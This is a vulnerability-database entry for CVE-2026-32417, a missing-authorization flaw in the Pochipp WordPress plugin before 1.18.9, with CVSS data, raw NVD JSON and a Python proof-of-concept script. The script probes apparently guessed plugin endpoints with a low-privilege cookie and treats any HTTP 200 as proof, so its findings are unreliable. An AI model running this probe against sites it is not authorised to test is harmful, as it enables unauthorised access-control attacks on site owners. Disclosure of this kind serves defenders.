Security Vulnerability Report
中文
CVE-2026-32417 CVSS 5.4 MEDIUM

CVE-2026-32417

Published: 2026-03-13 19:54:59
Last Modified: 2026-04-29 10:17:08

Description

Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pochipp: from n/a through < 1.18.9.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Pochipp < 1.18.9 (所有低于1.18.9的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32417 PoC概念验证(仅供安全研究) # 该PoC展示漏洞存在性,请勿用于非法用途 import requests import sys def check_vulnerability(target_url, auth_cookie): """ 检查目标WordPress站点是否受CVE-2026-32417影响 使用低权限账户Cookie尝试访问管理员功能 """ # 定义可能被滥用的API端点 endpoints = [ '/wp-json/pochipp/v1/settings', '/wp-admin/admin-ajax.php?action=pochipp_get_settings', '/wp-json/pochipp/v1/products' ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint headers = { 'Cookie': auth_cookie, 'Content-Type': 'application/json' } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f'[+] 漏洞可能存在: {endpoint}') print(f' 状态码: {response.status_code}') return True except requests.RequestException as e: print(f'[-] 请求失败: {e}') return False if __name__ == '__main__': if len(sys.argv) < 3: print('用法: python poc.py <目标URL> <低权限Cookie>') sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] check_vulnerability(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32417", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:59.117", "lastModified": "2026-04-29T10:17:07.830", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wppochipp Pochipp pochipp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pochipp: from n/a through < 1.18.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en wppochipp Pochipp pochipp permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Pochipp: desde n/a hasta &lt; 1.18.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pochipp/vulnerability/wordpress-pochipp-plugin-1-18-9-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}